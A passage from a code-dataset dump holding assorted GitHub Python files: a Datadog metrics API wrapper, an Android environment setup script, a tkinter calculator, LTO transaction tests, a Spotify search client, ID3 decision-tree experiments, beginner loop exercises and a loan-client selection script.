label=self.__paramsPlot[i][0])\n paramLeg2 = patches.Patch(color=self.__paramsPlot[i][3], label=self.__paramsPlot[i][1])\n b.legend(handles=[paramLeg1, paramLeg2], loc=\"upper right\", framealpha=1)\n","repo_name":"weaweg/weatherApp","sub_path":"weather/WeatherPlot.py","file_name":"WeatherPlot.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11339720783","text":"# stdlib\nimport time\nfrom numbers import Number\n\n# datadog\nfrom datadog.api.exceptions import ApiError\nfrom datadog.api.resources import SearchableAPIResource, SendableAPIResource\n\n\nclass Metric(SearchableAPIResource, SendableAPIResource):\n \"\"\"\n A wrapper around Metric HTTP API\n \"\"\"\n _class_url = None\n _json_name = 'series'\n\n _METRIC_QUERY_ENDPOINT = '/query'\n _METRIC_SUBMIT_ENDPOINT = '/series'\n\n @classmethod\n def _process_points(cls, points):\n \"\"\"\n Format `points` parameter.\n\n Input:\n a value or (timestamp, value) pair or a list of value or (timestamp, value) pairs\n\n Returns:\n list of (timestamp, float value) pairs\n\n \"\"\"\n now = time.time()\n points_lst = points if isinstance(points, list) else [points]\n\n def rec_parse(points_lst):\n \"\"\"\n Recursively parse a list of values or a list of (timestamp, value) pairs to a list of\n (timestamp, `float` value) pairs.\n \"\"\"\n try:\n if not points_lst:\n return []\n\n point = points_lst.pop()\n timestamp = now if isinstance(point, Number) else point[0]\n value = float(point) if isinstance(point, Number) else float(point[1])\n\n point = [(timestamp, value)]\n\n return point + rec_parse(points_lst)\n\n except TypeError as e:\n raise TypeError(\n u\"{0}: \"\n \"`points` parameter must use real numerical values.\".format(e)\n )\n\n except IndexError as e:\n raise IndexError(\n u\"{0}: \"\n u\"`points` must be a list of values or \"\n u\"a list of (timestamp, value) pairs\".format(e)\n )\n\n return rec_parse(points_lst)\n\n @classmethod\n def send(cls, metrics=None, **single_metric):\n \"\"\"\n Submit a metric or a list of metrics to the metric API\n\n :param metric: the name of the time series\n :type metric: string\n\n :param points: a (timestamp, value) pair or list of (timestamp, value) pairs\n :type points: list\n\n :param host: host name that produced the metric\n :type host: string\n\n :param tags: list of tags associated with the metric.\n :type tags: string list\n\n :param type: type of the metric\n :type type: 'gauge' or 'counter' string\n\n :returns: JSON response from HTTP request\n \"\"\"\n def rename_metric_type(metric):\n \"\"\"\n FIXME DROPME in 1.0:\n\n API documentation was illegitimately promoting usage of `metric_type` parameter\n instead of `type`.\n To be consistent and avoid 'backward incompatibilities', properly rename this parameter.\n \"\"\"\n if 'metric_type' in metric:\n metric['type'] = metric.pop('metric_type')\n\n # Set the right endpoint\n cls._class_url = cls._METRIC_SUBMIT_ENDPOINT\n\n # Format the payload\n try:\n if metrics:\n for metric in metrics:\n if isinstance(metric, dict):\n rename_metric_type(metric)\n metric['points'] = cls._process_points(metric['points'])\n metrics_dict = {\"series\": metrics}\n else:\n rename_metric_type(single_metric)\n single_metric['points'] = cls._process_points(single_metric['points'])\n metrics = [single_metric]\n metrics_dict = {\"series\": metrics}\n\n except KeyError:\n raise KeyError(\"'points' parameter is required\")\n\n return super(Metric, 
cls).send(attach_host_name=True, **metrics_dict)\n\n @classmethod\n def query(cls, **params):\n \"\"\"\n Query metrics from Datadog\n\n :param start: query start timestamp\n :type start: POSIX timestamp\n\n :param end: query end timestamp\n :type end: POSIX timestamp\n\n :param query: metric query\n :type query: string query\n\n :return: JSON response from HTTP request\n\n *start* and *end* should be less than 24 hours apart.\n It is *not* meant to retrieve metric data in bulk.\n\n >>> api.Metric.query(start=int(time.time()) - 3600, end=int(time.time()),\n query='avg:system.cpu.idle{*}')\n \"\"\"\n # Set the right endpoint\n cls._class_url = cls._METRIC_QUERY_ENDPOINT\n\n # `from` is a reserved keyword in Python, therefore\n # `api.Metric.query(from=...)` is not permited\n # -> map `start` to `from` and `end` to `to`\n try:\n params['from'] = params.pop('start')\n params['to'] = params.pop('end')\n except KeyError as e:\n raise ApiError(\"The parameter '{0}' is required\".format(e.args[0]))\n\n return super(Metric, cls)._search(**params)\n","repo_name":"alimoslehirad/django-metrics-prometheus","sub_path":"weather-app/venv/lib/python3.8/site-packages/datadog/api/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"74443106441","text":"import subprocess\r\nimport os\r\n\r\nAUTOTEST_ENVIRONMENT = '%CD%\\\\environment\\\\sdk\\\\platform-tools;%CD%\\\\environment\\\\sdk\\\\tools;%CD%\\\\environment\\\\nodejs;%CD%\\\\environment\\\\jdk\\\\bin'\r\n\r\nos.system('setx -m JAVA_HOME %CD%\\environment\\jdk')\r\nos.system('setx -m ANDROID_HOME %CD%\\environment\\sdk')\r\nos.system('setx -m AUTOTEST_ENVIRONMENT ' + AUTOTEST_ENVIRONMENT)\r\n\r\nresult = subprocess.check_output('reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path', shell=True)\r\nresult = result[result.index('REG_EXPAND_SZ') + 13:].strip()\r\nif '%AUTOTEST_ENVIRONMENT%' not in result:\r\n os.system('setx -m PATH ' + '\\\"'+ '%AUTOTEST_ENVIRONMENT%;' + result + '\\\"')\r\n\r\nraw_input('...')\r\n\r\n","repo_name":"Ruiqi-Alipay/AutomationEnvironment","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"26562602946","text":"input = [4, 6, 2, 9, 1, 8]\n# 4 6 2 9 1\n# - - - - - 0~4\n# 1 6 2 9 4\n# - - - - 1~4\n# 1 2 4 6 9\n# - - - 2~4\n# 1 2 4 6 9\n# - - 3~4\n\n# 1. 
first dry-run the for loops to check which indices get visited\n# 0~4, 1~4, 2~4, 3~4\n# for i in range(5-1):\n#     for j in range(5-i):\n#         print(i+j)\n\n# O(N^2)\ndef selection_sort(array):\n    n = len(array)\n    for i in range(n - 1):\n        min_index = i\n        for j in range(n - i):\n            # i+j : the index currently being tried\n            if array[i + j] < array[min_index]:\n                min_index = i + j\n        array[i], array[min_index] = array[min_index], array[i]\n\n    return\n\nselection_sort(input)\nprint(input) # should become [1, 2, 4, 6, 9]!","repo_name":"hortenssiaa/break-through-algorithms","sub_path":"week3/02_selection_sort_tt.py","file_name":"02_selection_sort_tt.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70111011080","text":"import tkinter\nimport customtkinter\n\nclass Calculator:\n\n    # Constructor\n    def __init__(self):\n        customtkinter.set_appearance_mode(\"Dark\")\n        customtkinter.set_default_color_theme(\"dark-blue\")\n\n        self.app = customtkinter.CTk()\n        self.app.geometry(\"240x360\")\n        self.app.resizable(0, 0)\n        self.app.title(' Calculator')\n        self.app.iconbitmap('logo.ico')\n\n        self.scvalue = tkinter.StringVar()\n        self.scvalue.set(\"\")\n        self.expression = customtkinter.CTkEntry(self.app, textvar = self.scvalue, width = 190, height = 35, corner_radius = 8,\n                                                justify = 'right')\n        self.expression.place(x = 20, y = 20)\n        self.expression.update()\n\n        # 1 Row\n        self.b1 = customtkinter.CTkButton(self.app, text = '9', width = 40, height = 40, text_font = ('Consolas', 14),\n                                          command = lambda: self.button_clicked(self.b1))\n        self.b1.place(x = 20, y = 70)\n\n        self.b2 = customtkinter.CTkButton(self.app, text = '8', width = 40, height = 40, text_font = ('Consolas', 14),\n                                          command = lambda: self.button_clicked(self.b2))\n        self.b2.place(x = 70, y = 70)\n\n        self.b3 = customtkinter.CTkButton(self.app, text = '7', width = 40, height = 40, text_font = ('Consolas', 14),\n                                          command = lambda: self.button_clicked(self.b3))\n        self.b3.place(x = 120, y = 70)\n\n        self.b4 = customtkinter.CTkButton(self.app, text = 'C', width = 40, height = 40, text_font = ('Consolas', 14),\n                                          command = lambda: self.button_clicked(self.b4))\n        self.b4.place(x = 170, y = 70)\n\n        # 2 Row\n        self.b5 = customtkinter.CTkButton(self.app, text = '6', width = 40, height = 40, text_font = ('Consolas', 14),\n                                          command = lambda: self.button_clicked(self.b5))\n        self.b5.place(x = 20, y = 120)\n\n        self.b6 = customtkinter.CTkButton(self.app, text = '5', width = 40, height = 40, text_font = ('Consolas', 14),\n                                          command = lambda: self.button_clicked(self.b6))\n        self.b6.place(x = 70, y = 120)\n\n        self.b7 = customtkinter.CTkButton(self.app, text = '4', width = 40, height = 40, text_font = ('Consolas', 14),\n                                          command = lambda: self.button_clicked(self.b7))\n        self.b7.place(x = 120, y = 120)\n\n        self.b8 = customtkinter.CTkButton(self.app, text = '+', width = 40, height = 40, text_font = ('Consolas', 14),\n                                          command = lambda: self.button_clicked(self.b8))\n        self.b8.place(x = 170, y = 120)\n\n        # 3 Row\n        self.b9 = customtkinter.CTkButton(self.app, text = '3', width = 40, height = 40, text_font = ('Consolas', 14),\n                                          command = lambda: self.button_clicked(self.b9))\n        self.b9.place(x = 20, y = 170)\n\n        self.b10 = customtkinter.CTkButton(self.app, text = '2', width = 40, height = 40, text_font = ('Consolas', 14),\n                                           command = lambda: self.button_clicked(self.b10))\n        self.b10.place(x = 70, y = 170)\n\n        self.b11 = customtkinter.CTkButton(self.app, text = '1', width = 40, height = 40, text_font = ('Consolas', 14),\n                                           command = lambda: 
self.button_clicked(self.b11))\n self.b11.place(x = 120, y = 170)\n\n self.b12 = customtkinter.CTkButton(self.app, text = '-', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b12))\n self.b12.place(x = 170, y = 170)\n\n # 4 Row\n self.b13 = customtkinter.CTkButton(self.app, text = '.', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b13))\n self.b13.place(x = 20, y = 220)\n\n self.b14 = customtkinter.CTkButton(self.app, text = '0', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b14))\n self.b14.place(x = 70, y = 220)\n\n self.b15 = customtkinter.CTkButton(self.app, text = '%', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b15))\n self.b15.place(x = 120, y = 220)\n\n self.b16 = customtkinter.CTkButton(self.app, text = '*', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b16))\n self.b16.place(x = 170, y = 220)\n\n # 5 Row\n self.b17 = customtkinter.CTkButton(self.app, text = '=', width = 140, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b17))\n self.b17.place(x = 20, y = 270)\n\n self.b18 = customtkinter.CTkButton(self.app, text = '/', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b18))\n self.b18.place(x = 170, y = 270)\n\n # Theme\n self.optionmenu = customtkinter.CTkOptionMenu(values = [\"Light\", \"Dark\", \"System\"], width = 90,\n command = self.change_theme)\n self.optionmenu.place(x = 70, y = 320)\n self.optionmenu.set(\"Dark\")\n\n # Button Press\n def button_clicked(self, button):\n text = button.text\n if text == \"=\":\n if self.scvalue.get().isdigit():\n value = int(self.scvalue.get())\n else:\n try:\n value = eval(self.expression.get())\n except Exception as e:\n value = \"Error\"\n\n self.scvalue.set(value)\n self.expression.update()\n elif text == \"C\":\n self.scvalue.set(\"\")\n self.expression.update()\n else:\n self.scvalue.set(self.scvalue.get() + text)\n self.expression.update()\n\n # Themes\n def change_theme(self, theme):\n customtkinter.set_appearance_mode(theme)\n\n # Tkinter Loop\n def run(self):\n self.app.mainloop()\n\nif __name__ == \"__main__\":\n calculator = Calculator()\n calculator.run()","repo_name":"JARUS23/Calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":6424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7582248242","text":"from lto.accounts.ed25519.account_factory_ed25519 import AccountFactoryED25519 as AccountFactory\nfrom lto.transactions.sponsorship import Sponsorship\nfrom unittest import mock\nfrom time import time\nfrom lto import crypto\nimport pytest\nfrom freezegun import freeze_time\n\nclass TestSponsorship:\n\n ACCOUNT_SEED = \"df3dd6d884714288a39af0bd973a1771c9f00f168cf040d6abb6a50dd5e055d8\"\n account = AccountFactory('T').create_from_seed(ACCOUNT_SEED)\n\n def test_construct(self):\n transaction = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n assert transaction.tx_fee == 500000000\n assert transaction.recipient == '3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb'\n\n\n @freeze_time(\"2021-01-14\")\n def test_sign_with(self):\n transaction = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n assert transaction.is_signed() is False\n transaction.sign_with(self.account)\n 
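# The assertions below pin down the post-signing state: is_signed() flips\n        # to True, the sender metadata is populated, and the first proof\n        # verifies against the account's ed25519 public key.\n        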
assert transaction.is_signed() is True\n timestamp = int(time() * 1000)\n assert str(transaction.timestamp)[:-3] == str(timestamp)[:-3]\n assert transaction.sender == '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2'\n assert transaction.sender_key_type == 'ed25519'\n assert transaction.sender_public_key == '4EcSxUkMxqxBEBUBL2oKz3ARVsbyRJTivWpNrYQGdguz'\n assert self.account.verify_signature(transaction.to_binary(), transaction.proofs[0])\n\n\n expected_v1 = {\n \"type\": 18,\n \"version\": 1,\n \"recipient\": '3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb',\n \"sender\": '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2',\n \"senderPublicKey\": '4EcSxUkMxqxBEBUBL2oKz3ARVsbyRJTivWpNrYQGdguz',\n \"fee\": 500000000,\n 'senderKeyType': 'ed25519',\n \"timestamp\": 1326499200000,\n \"proofs\": ['3gEX99xgnNbbbTVsqZ2mVc1ed1pcAzsAmVoxTXYmhY2xnANNW9NoxXsLyy2m5xot2qXhXb5ZHgL6ZmeYeB1CctWe']\n }\n\n expected_v3 = {\n \"type\": 18,\n \"version\": 3,\n \"senderKeyType\": \"ed25519\",\n \"sender\": '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2',\n \"senderPublicKey\": '4EcSxUkMxqxBEBUBL2oKz3ARVsbyRJTivWpNrYQGdguz',\n \"recipient\": '3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb',\n \"timestamp\": 1326499200000,\n \"fee\": 500000000,\n \"proofs\": ['3tTspKV5QemQsxPwoUttaLc7UabQquhSxw1m8qgA9ugiEuDJp2mV2hbcp1C959VrJ1iG8bNgnrTC55E43MDYqPqa']\n }\n\n @freeze_time(\"2021-01-14\")\n @pytest.mark.parametrize(\"version, expected\", [(1, expected_v1), (3, expected_v3)])\n def test_to_json(self, expected, version):\n transaction = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n transaction.timestamp = 1326499200000\n transaction.version = version\n transaction.sign_with(self.account)\n assert transaction.to_json() == expected\n\n @mock.patch('src.lto.PublicNode')\n def test_broadcast(self, mock_PublicNode):\n transaction = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n broadcasted_tx = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n broadcasted_tx.id = '7cCeL1qwd9i6u8NgMNsQjBPxVhrME2BbfZMT1DF9p4Yi'\n\n mc = mock_PublicNode.return_value\n mc.broadcast.return_value = broadcasted_tx\n\n assert mc.broadcast(transaction) == broadcasted_tx\n\n @freeze_time(\"2021-01-14\")\n def test_from_data(self):\n data = {\n \"type\": 18,\n \"version\": 1,\n \"id\": \"8S2vD5dGCPhwS8jLzNQpSRYDBGXv6GKq6qT5yXUBWPgb\",\n \"sender\": \"3NBcx7AQqDopBj3WfwCVARNYuZyt1L9xEVM\",\n \"senderPublicKey\": \"7gghhSwKRvshZwwh6sG97mzo1qoFtHEQK7iM4vGcnEt7\",\n \"recipient\": \"3N9ChkxWXqgdWLLErWFrSwjqARB6NtYsvZh\",\n \"timestamp\": 1610410901000,\n \"fee\": 500000000,\n \"proofs\": [\n \"QKef6R8LrMBupBF9Ry8zjFTu3mexC55J6XNofDDQEcJnZJsRjZPnAk6Yn2eiHkqqd2uSjB2r58fC8QVLaVegQEz\"\n ],\n \"height\": 1225821\n }\n transaction = Sponsorship(data['recipient']).from_data(data)\n crypto.compare_data_transaction(data, transaction)\n","repo_name":"ltonetwork/lto-api.python","sub_path":"tests/transactions/sponsorship_test.py","file_name":"sponsorship_test.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"25432983175","text":"import sys\r\nimport random\r\nimport copy\r\nfrom btnode import BSTNode\r\nfrom btree import LinkedBST\r\n\r\n\r\nsys.setrecursionlimit(100000)\r\n\r\n\r\n\r\n\r\nclass Board:\r\n\r\n\r\n computer_symbol = 'X'\r\n user_symbol = 'O'\r\n\r\n def __init__(self):\r\n self.board = [[None, None, None], [None, None, None], [None, None, None]]\r\n self.last_position = [None, None]\r\n self.last_symbol = None\r\n\r\n def last_symbol(self):\r\n return self.last_symbol\r\n\r\n\r\n\r\n 
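# Board encapsulates the 3x3 tic-tac-toe grid. put_symbol() validates a\r\n    # move, build_tree() samples random continuations of the position into a\r\n    # binary tree, and choose_the_position() scores its leaves (+1 computer\r\n    # win, -1 user win) to pick the more promising branch.\r\n    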
def put_symbol(self, position, symbol):\r\n        if position[0] < 0 or position[0] > 2 or position[1] < 0 or position[1] > 2:\r\n            raise ValueError('Please enter a valid position!')\r\n        elif self.board[position[0]][position[1]] is not None:\r\n            raise ValueError('The position is already filled!')\r\n        else:\r\n            self.board[position[0]][position[1]] = symbol\r\n\r\n\r\n    def build_tree(self, board):\r\n\r\n\r\n        tree = LinkedBST()\r\n        tree.add(board)\r\n        computer_turn = False\r\n        try:\r\n            if self.last_symbol == Board.user_symbol or self.last_symbol is None:\r\n                computer_turn = True\r\n        except:\r\n            pass\r\n\r\n        def recurse(node, computer_turn):\r\n            try:\r\n                free = bool(max([position is None for line in node.data for position in line]))\r\n                if not free:\r\n                    return None\r\n            except:\r\n                pass\r\n\r\n            # pick a random empty cell for the left child\r\n            while True:\r\n                position = [random.choice([0, 1, 2]), random.choice([0, 1, 2])]\r\n                if node.data[position[0]][position[1]] is None:\r\n                    break\r\n                else:\r\n                    continue\r\n\r\n            if Board.check_the_status(node.data) is not None:\r\n                return None\r\n\r\n            our_board = copy.deepcopy(node.data)\r\n            if computer_turn:\r\n                our_board[position[0]][position[1]] = Board.computer_symbol\r\n            else:\r\n                our_board[position[0]][position[1]] = Board.user_symbol\r\n\r\n            node.left = BSTNode(our_board)\r\n\r\n            # pick a random empty cell for the right child\r\n            while True:\r\n                position = [random.choice([0, 1, 2]), random.choice([0, 1, 2])]\r\n                if node.data[position[0]][position[1]] is None:\r\n                    break\r\n                else:\r\n                    continue\r\n\r\n            if Board.check_the_status(node.data) is not None:\r\n                return None\r\n\r\n            our_board = copy.deepcopy(node.data)\r\n            if computer_turn:\r\n                our_board[position[0]][position[1]] = Board.computer_symbol\r\n            else:\r\n                our_board[position[0]][position[1]] = Board.user_symbol\r\n\r\n            node.right = BSTNode(our_board)\r\n\r\n            if computer_turn is True:\r\n                computer_turn = False\r\n            elif computer_turn is False:\r\n                computer_turn = True\r\n\r\n            recurse(node.left, computer_turn)\r\n            recurse(node.right, computer_turn)\r\n\r\n        recurse(tree._root, computer_turn)\r\n        return tree\r\n\r\n    def choose_the_position(self):\r\n        tree = self.build_tree(self.board)\r\n\r\n        def counter(node):\r\n            if node is not None:\r\n                if node.left is None and node.right is None:\r\n                    if Board.user_symbol == Board.check_the_status(node.data):\r\n                        return -1\r\n                    elif Board.computer_symbol == Board.check_the_status(node.data):\r\n                        return 1\r\n                    else:\r\n                        return 0\r\n                return (counter(node.left) + counter(node.right))\r\n            else:\r\n                pass\r\n        left_counter = counter(tree._root.left)\r\n        right_counter = counter(tree._root.right)\r\n        try:\r\n            if left_counter > right_counter:\r\n                return tree._root.left.data\r\n            else:\r\n                return tree._root.right.data\r\n        except:\r\n            pass\r\n\r\n    def __str__(self):\r\n        \"\"\"\r\n        String representation of board\r\n        :return str:\r\n        \"\"\"\r\n        result = \"\"\r\n        for line in self.board:\r\n            for i in line:\r\n                if i is None:\r\n                    result += \"  \"\r\n                else:\r\n                    result += i + \" \"\r\n            result += \"\\n\"\r\n\r\n        return result\r\n\r\n\r\n\r\n    @staticmethod\r\n    def check_the_status(board):\r\n        for i in range(0, 3):\r\n            # rows\r\n            if board[i][0] == board[i][1] == board[i][2] and board[i][0] is not None:\r\n                return board[i][0]\r\n\r\n            # columns\r\n            if board[0][i] == board[1][i] == board[2][i] and board[0][i] is not None:\r\n                return board[0][i]\r\n\r\n        # diagonals\r\n        if board[0][0] == board[1][1] == board[2][2] and board[2][2] is not None:\r\n            return board[2][2]\r\n\r\n        if board[2][0] == board[1][1] == board[0][2] and board[0][2] is not None:\r\n            return board[0][2]\r\n\r\n\r\n    def free_position(self):\r\n        free = bool(max([position is None for line 
in self.board for position in line]))\r\n return free\r\n","repo_name":"abalakirskaya/Tic-Tac-Toe","sub_path":"task_3/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"69863924041","text":"import os\nimport sys\nimport requests\nimport base64\n\nfrom enum import Enum\n\ndef refresh_login(f):\n def wrapper(*args):\n args[0].login()\n return f(*args)\n return wrapper\n\nclass SpotifySearchType(Enum):\n TRACK=\"track\"\n ALBUM=\"album\"\n ARTIST=\"artist\"\n PLAYLIST=\"playlist\"\n SHOW=\"show\"\n EPISODE=\"episode\"\n\nclass SpotifyDriver:\n def __init__(self, client_id, client_secret) -> None:\n self.client_id = client_id\n self.client_secret = client_secret\n self.token = None\n\n self.BASE_AUTH_ADDRESS = \"https://accounts.spotify.com\"\n self.TOKEN_URI = \"/api/token\"\n\n self.BASE_API_ADDRESS = \"https://api.spotify.com/v1\"\n self.SEARCH_API = \"/search\"\n\n self.login()\n\n def login(self):\n auth_payload = f\"{self.client_id}:{self.client_secret}\"\n headers = {\n \"Authorization\": f\"Basic {base64.b64encode(auth_payload.encode('ascii')).decode('ascii')}\",\n }\n url = f\"{self.BASE_AUTH_ADDRESS}{self.TOKEN_URI}\"\n data = {\n \"grant_type\": \"client_credentials\"\n }\n rsp = requests.post(url, headers=headers, data=data)\n\n if rsp.status_code > 299:\n raise RuntimeError(f\"Failed to login to spotify: {rsp.json()}\")\n\n token = rsp.json()['access_token']\n\n self.token = token\n\n @refresh_login\n def search(self, track_name, artist):\n type = SpotifySearchType.TRACK.value\n query = f\"{track_name} artist:{artist}\"\n\n url = f\"{self.BASE_API_ADDRESS}{self.SEARCH_API}\"\n headers = {\n \"Authorization\": f\"Bearer {self.token}\",\n }\n params = {\n \"type\": type,\n \"q\": query\n }\n rsp = requests.get(url, headers=headers, params=params)\n\n if rsp.status_code > 299:\n raise RuntimeError(f\"Failed to search in spotify: {rsp.json()}\")\n\n rsp_json = rsp.json()\n return rsp_json.get('tracks').get('items')[0]","repo_name":"FServais/noplp","sub_path":"backend/src/driver/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25658136325","text":"import ID3\n\nData_train = []\nData_test = []\n\nColumns = [\n 'buying',\n 'maint',\n 'doors',\n 'persons',\n 'lug_boot',\n 'safety',\n 'label'\n]\n\nAttributes = {\n 'buying': ['vhigh', 'high', 'med', 'low'],\n 'maint': ['vhigh', 'high', 'med', 'low'],\n 'doors': ['2', '3', '4', '5more'],\n 'persons': ['2', '4', 'more'],\n 'lug_boot': ['small', 'med', 'big'],\n 'safety': ['low', 'med', 'high']\n}\n\nLabels = {'unacc', 'acc', 'good', 'vgood'}\n\n\n# read training data\nwith open('./car/train.csv', 'r') as train_file:\n for line in train_file:\n row = line.strip().split(',')\n Data_train.append(row)\n\ntrain_file.close()\n\n# read test data\nwith open('./car/test.csv', 'r') as test_file:\n for line in test_file:\n row = line.strip().split(',')\n Data_test.append(row)\n\ntest_file.close()\n\nprint(\"Decision Tree on Car\")\nprint(\"d e_trn_h e_trn_me e_trn_gi e_tst_h e_tstme e_tst_gi\")\n\n# prediction accuracy with different max_depth\nfor max_depth in range(1, 7):\n # generate decision trees based on different purity functions\n h_tree = ID3.ID3(Data_train, Columns, Attributes, Labels, ID3.entropy, max_depth, 0)\n me_tree = ID3.ID3(Data_train, Columns, Attributes, Labels, 
ID3.majority_error, max_depth, 0)\n    gi_tree = ID3.ID3(Data_train, Columns, Attributes, Labels, ID3.gini_index, max_depth, 0)\n\n    # count prediction hits in training set\n    train_size = len(Data_train)\n    train_hit_h = 0\n    train_hit_me = 0\n    train_hit_gi = 0\n\n    for row in Data_train:\n        train_hit_h += ID3.predict_hit(row, Columns, h_tree)\n        train_hit_me += ID3.predict_hit(row, Columns, me_tree)\n        train_hit_gi += ID3.predict_hit(row, Columns, gi_tree)\n\n    # calculate error rate in training set\n    train_err_h = 1 - train_hit_h/train_size\n    train_err_me = 1 - train_hit_me/train_size\n    train_err_gi = 1 - train_hit_gi/train_size\n\n    # count prediction hits in test set\n    test_size = len(Data_test)\n    test_hit_h = 0\n    test_hit_me = 0\n    test_hit_gi = 0\n\n    for row in Data_test:\n        test_hit_h += ID3.predict_hit(row, Columns, h_tree)\n        test_hit_me += ID3.predict_hit(row, Columns, me_tree)\n        test_hit_gi += ID3.predict_hit(row, Columns, gi_tree)\n\n    # calculate error rate in test set\n    test_err_h = 1 - test_hit_h/test_size\n    test_err_me = 1 - test_hit_me/test_size\n    test_err_gi = 1 - test_hit_gi/test_size\n\n    print(max_depth, format(train_err_h, \".3f\"), format(train_err_me, \".3f\"), format(train_err_gi, \".3f\"), \n    format(test_err_h, \".3f\"), format(test_err_me, \".3f\"), format(test_err_gi, \".3f\"), sep=\" & \")\n\n\n","repo_name":"lzhangsysu/ml_lib","sub_path":"DecisionTree/run_car.py","file_name":"run_car.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"2247986227","text":"sayilar = [1,3,5,7,9,12,19,21]\n\n# 1: Print the sayilar list to the screen with while.\n# 2: Read start and end values from the user and print the numbers in between.\n# 3: Print the numbers from 1 to 100 in descending order.\n# 4: Read 5 numbers from the user and print them on screen in sorted order.\n# 5: Read an unlimited amount of product data from the user and print it from the urunler list\n# ** ask the user for the number of products.\n# ** the dictionary list structure should have the form (name, price).\n# ** when adding products is finished, list the products on screen with while.\n\nprint('------------------------1---------------------')\n\ni = 0\n\nwhile i < len(sayilar):\n    print(sayilar[i])\n    i += 1\n\nprint('------------------------2---------------------')\nbas = int(input('Enter the first number:'))\nson = int(input('Enter the last number:'))\n\ni = bas\nwhile i <= son:\n    print(i)\n    i+=1\n\nprint('------------------------3---------------------')\ni = 100\nwhile i >= 1:\n    print(i)\n    i-=1\n\nprint('------------------------4---------------------')\ni = 1\nlist = []\nwhile i <= 5:\n    list.append(int(input(f'Enter number {i} ')))\n    i += 1\n\nlist.sort()\nprint(list)\n\nprint('------------------------5---------------------')\nurunler = []\nadet = int(input('how many products do you want to add:'))\ni = 0\nwhile (i 0:\n#         list_1.append(a % 2)\n#         a = a // 2\n#     print(*list_1[::-1], sep ='')\n\na_string =''\nwhile a > 0:\n    a_string = str(a % 2) + a_string\n    a //= 2\nprint(int(a_string))","repo_name":"NikVova/Python","sub_path":"Lection4/4_4.py","file_name":"4_4.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15387264253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 11 08:24:50 2019\r\n\r\n@author: Luis Rodriguez\r\n\"\"\"\r\n\r\n# Selecting Best Clients, Loan Amount, Loan Term and Annual Interest.\r\n\r\nimport pandas as 
pd\r\n\r\ndata_set=pd.read_csv('model_dataset_vf.csv')\r\n\r\n# Best clients will be the ones who are in Class=1 and the Predicted Class = 1,\r\n# and whose income minus outgoings minus the real monthly payment is greater than 0.\r\n\r\n\r\n# logistic_regresion_model and X are expected to be defined by the companion\r\n# model-training script before this step runs.\r\ndata_set['class_prediction']=logistic_regresion_model.predict(X)\r\n\r\n\r\ndata_pred=data_set.loc[data_set['class'] == 1] \r\nbest_clients=data_pred.loc[data_pred['class_prediction'] == 1]\r\n\r\n\r\nbest_clients['free_income']=best_clients['difference_surplus']-best_clients['real_monthly_payment']\r\nbest_clients=best_clients.loc[best_clients['free_income']>0]\r\nbest_clients=best_clients.loc[best_clients['maximum_number_of_credit_payments']>0]\r\n\r\nprint('159 clients were classified as Best Clients') \r\n\r\n# Loan amount\r\n# In business management, the recommended practice for a company in a regular\r\n# situation is to use at most 50% of its surplus to pay its credits.\r\n# Considering this situation, and encouraging our clients' business health,\r\n# our recommended amounts should be considered as 50% of their free income per month.\r\n\r\nbest_clients['loan_ammount_monthly_payment']=best_clients['free_income']/2\r\n\r\n# Loan term\r\n# Based on the client's maximum credit term in months, offering them an increase\r\n# of 10% in maximum credit terms.\r\n\r\nbest_clients['recomended_loan_term']=best_clients['maximum_number_of_credit_payments']*1.1\r\n\r\n# Credit 